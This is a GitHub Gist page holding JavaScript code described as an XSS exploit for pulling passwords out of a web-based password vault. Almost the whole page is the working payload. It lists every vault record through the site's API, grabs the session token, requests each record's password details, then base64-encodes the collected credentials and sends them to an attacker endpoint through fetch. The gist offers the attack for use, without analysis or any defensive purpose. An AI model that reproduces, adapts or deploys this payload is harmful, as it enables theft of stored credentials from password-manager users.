Forked from shawarkhanethicalhacker/password_vault_exploit.js
Created
August 24, 2018 01:18
-
-
Save CaledoniaProject/c176cc2148fd188be1a7b3c855c900d9 to your computer and use it in GitHub Desktop.
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Exploit Code by Shawar Khan | |
var data_chunks = ''; | |
// Capturing Records from API | |
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
// Holds the records in as String | |
var allrecords = data; | |
// converting response to JSON | |
json_allrecords = JSON.parse(allrecords)['records']; | |
// holds record Ids | |
var record_ids = new Array(); | |
Object.entries(json_allrecords).forEach(function(obj) { | |
record_ids.push((obj['1']['0']['id'])); | |
}); | |
// Capturing Session Token / Used to send POST requests | |
fetch('https://redacted.com/api/v1/session/token').then((resp) => resp.text()).then(function(data1) { | |
// Holds Session Token | |
var session_token = JSON.parse(data1)['session_token']; | |
data_chunks = ""; // Will hold a complete record | |
//Put loop for itterating through IDS | |
record_ids.forEach(function(record_id) { | |
// Looping through IDs and grabing Passwords | |
var grab_password = new XMLHttpRequest(); | |
grab_password.open('POST', 'https://redacted.com/api/v1/passwords/record', true); | |
grab_password.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); | |
grab_password.setRequestHeader("token", session_token); | |
grab_password.onload = function () { | |
response_password = this.responseText; | |
parsed_passwords = JSON.parse(response_password); | |
// Sending data chunks | |
data_chunks += parsed_passwords['record']['description'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['0']['value'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['1']['value'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['2']['value']+"\n\n" | |
}; | |
grab_password.send(JSON.stringify({id:record_id,is_organization:false})); | |
}); | |
setTimeout(function(){ // Submitting Data Chunks to Attacker | |
fetch('http://127.0.0.1/?data='+btoa(data_chunks)) | |
}, 2000); | |
}); | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment